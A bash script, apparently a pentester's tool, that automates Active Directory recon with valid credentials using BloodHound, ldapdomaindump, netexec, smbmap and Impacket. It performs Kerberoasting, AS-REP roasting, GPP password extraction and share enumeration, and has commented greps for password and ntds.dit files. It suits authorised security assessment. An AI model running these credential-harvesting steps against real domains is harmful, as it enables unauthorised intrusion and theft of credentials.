#!/bin/bash

VERBOSE=0

printred(){
        echo -e "\033[0;31m$1\033[0m"
}
printgreen(){
        echo -e "\033[0;32m$1\033[0m"
}

# Impacket folder for kali linux:
IMPACKETSCRIPTS="/usr/share/doc/python3-impacket/examples"
NETEXEC="netexec"
SMBMAP="smbmap"
BLOODHOUND="$HOME/.local/bin/bloodhound-ce-python"
LDAPDOMAINDUMP="ldapdomaindump"

MODE=audit

# Retired tools:
#DROPTHEMICSCANNER="/opt/outils/exploit/cve-2019-1040-scanner/scan.py"
#SMBCRUNCHDIR="/opt/outils/windows/SMBCrunch/"
#GODDI="/opt/outils/windows/goddi/goddi-linux-amd64"
#LDAPSCANNER="/opt/outils/windows/ldap-scanner/ldap-scanner.py" #retired

checkbinary(){
        BINARY="$1"
        MANDATORY="$2"
        FOUND=false
        #echo "Checking for $BINARY"
        if [ -x "$BINARY" ]; then
                #echo "binary found at specified path"
                FOUND=true
        fi
        if [ -x "$(which $BINARY)" ]; then
                #echo "$BINARY found in the path"
                FOUND=true
        fi
        if [ "$FOUND" == true ]; then
                printgreen "Found: $BINARY"
        fi
        if [ "$MANDATORY" != true ] && [ "$FOUND" == false ]; then
                printred "Not found requirement: $BINARY"
        fi
        if [ "$MANDATORY" == true ] && [ "$FOUND" == false ]; then
                printred "Not found mandatory requirement: $BINARY"
                exit 1
        fi
}

checkreqs(){
	checkbinary "$IMPACKETSCRIPTS/GetADUsers.py"
	checkbinary "$NETEXEC" true
	checkbinary "$BLOODHOUND" true
	checkbinary "$SMBMAP" true
	checkbinary "$LDAPDOMAINDUMP" true
}

printusage(){
	echo "USAGE:
	$0 USERNAME PASSWORD FULLDOMAIN_NAME SMBHOSTSFILE [DCIP]
	
	Do all possible recon on a windows AD with user valid creds
"
}

printfullusage(){
	echo "
$0 (audit|scan)
	audit         		Prints out commands that will be performed during the scan without executing them
	scan            	Perform an AD scan with valid user credentials and save the output

	-u <username>   	Username to use to authentication with the AD
	-p <password>   	Password of the user to authenticate with
	-d <domain>  		(optional) Domain to authenticate with
	-c <dcip>   		(optional) IP address of a Domain Controller
	-i <hostfile>		(optional) Valid path to a file containing a list of SMB hosts. If provided, will be combined with the domain computer list.
	-x <socks-proxy>	Socks proxy server [format: IP:PORT]
	-v              	Verbose mode
	-h              	Print this help
"
}

printOrExecute(){
	CMD="$1"
	MODE="$2"
	if [ "$MODE" == "audit" ]; then
		echo "[AUDIT] $CMD"
	else
		if [ "$VERBOSE" == 1 ]; then
			echo "[EXECUTING] $CMD"
		fi
		eval "$CMD"
	fi
}

logger(){
	MESSAGE="$1"
	if [ "$MODE" == "audit" ]; then
		echo "$MESSAGE"
	else
		echo "$MESSAGE" | tee -a "$LOGFILE"
	fi
}

isAccountValid(){
	DCIP="$1"
	USERNAME="$2"
	PASSWORD="$3"
	DOMAIN="$4"
	printOrExecute "$SMBMAP -H \"$DCIP\" -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" | grep \"Status: Authenticated\"" "$MODE"
	return $?
}

isValidArgument(){
	#Verify if argument is empty or begins with a '-' char
	argument="$1"
	if [ "$argument" == "" -o "${argument:0:1}" == "-" ]; then
		echo "Invalid argument value $1"
		return 1
	fi
	return 0
}


# Start of main:
checkreqs

# Identify mode
if [ "$1" == "audit" ]; then
	MODE="audit"
	echo "Audit mode selected, no command will be executed"
elif [ "$1" == "scan" ]; then
	MODE="scan"
	echo "Scan mode selected, commands will be executed"
else
	echo "First argument must be either 'audit' or 'scan'"
	printfullusage
	exit 1
fi

# Argument parsing
OPTIND=2         # Position ourselves after the first mandatory argument (mode)
# Initialize our own variables:
USERNAME=""
PASSWORD=""
DOMAIN=""
HOSTFILE=""
DCIP=""
SOCKS=0
while getopts ":h?vxu:p:d:i:c:" opt; do
	case "$opt" in
		h)  printfullusage
			exit 1
			;;
		v)  VERBOSE=1
			echo "Verbose mode activated"
			;;
		x)  SOCKS=1
			echo "Socks proxy mode activated
			Using proxychains4 for all network commands"
			;;
		u)  USERNAME="${OPTARG}"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -u requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		p)  PASSWORD="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -p requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		d)  DOMAIN="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -d requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		i)  HOSTFILE="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -i requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		c)  DCIP="$OPTARG"
			if [[ "${OPTARG}" == -* ]]; then
				echo "Option -c requires a valid argument. Got: ${OPTARG}"
				printfullusage
				exit 1
			fi
			;;
		:)  echo "Option -${OPTARG} requires an argument."
			exit 1
			;;
		?)  echo "Unrecognised Option: -${OPTARG}"
			exit 1
			;;
	esac
done

logger "\$USERNAME=$USERNAME"
logger "\$PASSWORD=$PASSWORD"
logger "\$DOMAIN=$DOMAIN"
logger "\$HOSTFILE=$HOSTFILE"
logger "\$DCIP=$DCIP"
logger "\$SOCKS=$SOCKS"
echo ""

shift $((OPTIND-1))
[ "${1:-}" = "--" ] && shift

if [ "$USERNAME" = "" -o "$PASSWORD" == "" ]; then
	echo "Missing at least one mandatory argument:"
	echo "		Username, Password"
	echo ""
	printfullusage
	exit 1
fi
if [ "$DOMAIN" == "" -a "$DCIP" == "" ]; then
	echo "Neither Domain nor DCIP provided:"
	echo "		Please provide at least one of them."
	echo ""
	printfullusage
	exit 1
fi
# Argument parsing done

DATE=$(date +"%Y%m%d-%H-%M")
#TODO add option to override the OUTPUTDIR
OUTPUTDIR="./autoADRecon_${DATE}"
LOGFILE="$OUTPUTDIR/autoADRecon_${DATE}.log"

# Determine missing parameters
if [ "$DCIP" == "" ]; then
	echo "DC IP not provided, attempting to find it automatically"
	#if not provided determine automatically the DC IP
	DCIP=$(host "$DOMAIN" | grep "has address" | cut -d ' ' -f 4 | head -1)
	if [ "$DCIP" == "" ]; then
		printred "Can't find the DC automatically, please provide it"
		exit 1
	fi
	printgreen "Found $DCIP as DCIP, continue?"
fi
if [ "$DOMAIN" == "" ]; then
	echo "Domain not provided attempting to find it automatically"
	#if not provided determine automatically the Domain by connecting to the DC provided
	DOMAIN="$($NETEXEC smb $DCIP)" | grep domain: | cut -d '(' -f 3 | cut -d : -f 2 | sed 's/)//'
	if [ "$DOMAIN" == "" ]; then
		printred "Can't find the Domain automatically, please provide it"
		exit 1
	fi
	printgreen "Found $DOMAIN as domain, continue?"
fi

# Test that the account is valid
logger "Checking if provided credentials are valid on $DCIP for domain $DOMAIN with user $USERNAME:"
if [ "$MODE" == "audit" ]; then	
	echo "	Not verifying credentials in audit mode"
else
	if ! isAccountValid "$DCIP" "$USERNAME" "$PASSWORD" "$DOMAIN"; then
		echo "	Can't connect with supplied credentials ($USERNAME) to $DCIP ($DOMAIN)"
	exit 1
	fi
fi

# Create output directory
if [ "$MODE" != "audit" ]; then
	mkdir "$OUTPUTDIR" || exit
fi

if [ "$SOCKS" == 1 ]; then
	NETEXEC="proxychains4 $NETEXEC"
	SMBMAP="proxychains4 $SMBMAP"
	IMPACKETSCRIPTS="proxychains4 $IMPACKETSCRIPTS"
	LDAPDOMAINDUMP="proxychains4 $LDAPDOMAINDUMP"
	BLOODHOUND="proxychains4 $BLOODHOUND"
fi

#Do the GPP check
#TODO

#List domain Controllers again
logger "
Domain controllers in the domain $DOMAIN are:"
printOrExecute "host \"$DOMAIN\" | grep \"has address\" | cut -d ' ' -f 4 | tee \"$OUTPUTDIR/domainControllers.list\"" "$MODE"

#AD recon
logger "
Fetching Bloodhound data from the AD:"
printOrExecute "
mkdir \"$OUTPUTDIR/bloodhound\" || exit \
cd \"$OUTPUTDIR/bloodhound\" || exit \
\"$BLOODHOUND\" -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" -c All,LoggedOn --zip --dns-tcp -ns \"$DCIP\" | tee -a \"../../$LOGFILE\" \
cd ../../ || exit" "$MODE"

logger "
Fetching AD infos:"
# Retired
#"$GODDI" -username "$USERNAME" -password "$PASSWORD" -domain "$DOMAIN" -dc "$DOMAIN" -unsafe 2>&1 | tee -a "$LOGFILE"
#TODO check result and get the following folder from the output of the tool
#mv /opt/outils/windows/goddi/csv/ "$OUTPUTDIR/goddi-csv" | tee -a "$LOGFILE"
printOrExecute "\"$LDAPDOMAINDUMP\" --user \"$DOMAIN\\$USERNAME\" --password \"$PASSWORD\" --outdir ldapdomaindump \"$DCIP\" -o \"$OUTPUTDIR\" | tee -a \"$LOGFILE\"" "$MODE"

logger "
Combining hostfile provided with domain computer list from ldapdomaindump"
COMBINEDHOSTFILE="$OUTPUTDIR/combined_computers.list"
cut -f 3 -d ',' "$OUTPUTDIR/ldapdomaindump/domain_computers.grep" | sort -u > "$OUTPUTDIR/ldapdomaindump/domain_computers.grep.list"
if [ "$HOSTFILE" == "" ]; then
	printgreen "No hostfile provided, using only domain computer list"
	cp "$OUTPUTDIR/ldapdomaindump/domain_computers.grep.list" "$COMBINEDHOSTFILE"
else
	cat "$HOSTFILE" "$OUTPUTDIR/ldapdomaindump/domain_computers.grep.list" | sort -u > "$COMBINEDHOSTFILE"
fi


# Deprecated: got that from ldapdomaindump
# get the user list
#logger "
#Fetching AD Users List:"
#printOrExecute "\"$IMPACKETSCRIPTS/GetADUsers.py\" -all \"$DOMAIN/$USERNAME:$PASSWORD\" -dc-ip \"$DCIP\" | tee -a \"$LOGFILE\" | tee \"$OUTPUTDIR/allUsersList.out\"" "$MODE"

#extract UserSPN TGS tickets
logger "
Fetching User SPN TGSs:"
#TODO no timeout option supported by impacket :(
printOrExecute "\"$IMPACKETSCRIPTS/GetUserSPNs.py\"  -request \"$DOMAIN/$USERNAME:$PASSWORD\" -dc-ip \"$DCIP\" | tee -a \"$LOGFILE\" | tee \"$OUTPUTDIR/userSPNs.out\"" "$MODE"
#extract TGTs without kerberos pre-auth
logger "
Fetching TGTs of users without pre-auth:"
printOrExecute "\"$IMPACKETSCRIPTS/GetNPUsers.py\" \"$DOMAIN/$USERNAME:$PASSWORD\" -request -dc-ip \"$DCIP\" | tee -a \"$LOGFILE\" | tee \"$OUTPUTDIR/preAuthUsers.out\"" "$MODE"


#Find unpatched systems:
logger "
Look for unpatched systems:"
logger "TODO: drop-the-mic"
#python3 "$DROPTHEMICSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$HOSTFILE" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/dropthemicVulnerableHosts.out"

#List domain controllers
logger "
Look for LDAP signing on domain controllers"
#python3 "$LDAPSCANNER" "$DOMAIN/$USERNAME:$PASSWORD@" -target-file "$OUTPUTDIR/domainControllers.list" 2>&1 | tee -a "$LOGFILE"  | tee "$OUTPUTDIR/ldapSigningDCs.out"
printOrExecute "\"$NETEXEC\" ldap \"$OUTPUTDIR/domainControllers.list\" -M ldap-checker -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" | tee -a \"$LOGFILE\" | tee \"$OUTPUTDIR/ldapSigningDCs.out\"" "$MODE"

#list all accessible shares
logger "
List all accessible shares"
printOrExecute "\"$SMBMAP\" --host-file \"$HOSTFILE\" -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" | tee -a \"$LOGFILE\"  | tee \"$OUTPUTDIR/smbmapAll.out\"" "$MODE"
#TODO: HOSTFILE is too large and inefficient in large networks. smbhosts file would be better here
#"$SMBCRUNCHDIR/SMBHunt.pl" -i "$HOSTFILE" -o "$OUTPUTDIR/smbhunt.out" -a "$DOMAIN\\$USERNAME:$PASSWORD" | tee -a "$LOGFILE"
#list all files in thoses shares
#"$SMBCRUNCHDIR/SMBList.pl" -c "$DOMAIN\\$USERNAME:$PASSWORD" -s "$OUTPUTDIR/smbhunt.out" -o "$OUTPUTDIR/smblist.out" | tee -a "$LOGFILE"
#search for interesting file names in the output
#grep -i passw "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i pwd "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i cred "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i .kdbx "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i "shadow " "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"
#grep -i ntdis.dit "$OUTPUTDIR/smblist.out/ALL_COMBINED_RESULTS.txt"

#Search for quick wins
#First, dig for gpp passwords
logger "
Looking for passwords in GPPs"
printOrExecute "\"$NETEXEC\" smb \"$DOMAIN\" -u \"$USERNAME\" -p \"$PASSWORD\" -M gpp_password | tee -a \"$LOGFILE\" | tee \"$OUTPUTDIR/gppScan.out\"" "$MODE"
logger "
Looking for passwords in autologin"
printOrExecute "\"$NETEXEC\" smb \"$DOMAIN\" -u \"$USERNAME\" -p \"$PASSWORD\" -M gpp_autologin | tee -a \"$LOGFILE\" | tee -a \"$OUTPUTDIR/gppScan.out\"" "$MODE"
#Get MachineAccountQuota attribute
logger "
Get MachineAccountQuota attribute:"
printOrExecute "\"$NETEXEC\" ldap \"$DCIP\" -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M maq | tee -a \"$LOGFILE\" | tee -a \"$OUTPUTDIR/maq.out\"" "$MODE"

#List ADCS servers
logger "
Get ADCS servers:"
printOrExecute "\"$NETEXEC\" ldap \"$DCIP\" -u \"$USERNAME\" -p \"$PASSWORD\" -d \"$DOMAIN\" -M adcs | tee -a \"$LOGFILE\" | tee -a \"$OUTPUTDIR/adcs.out\"" "$MODE"

exit 0
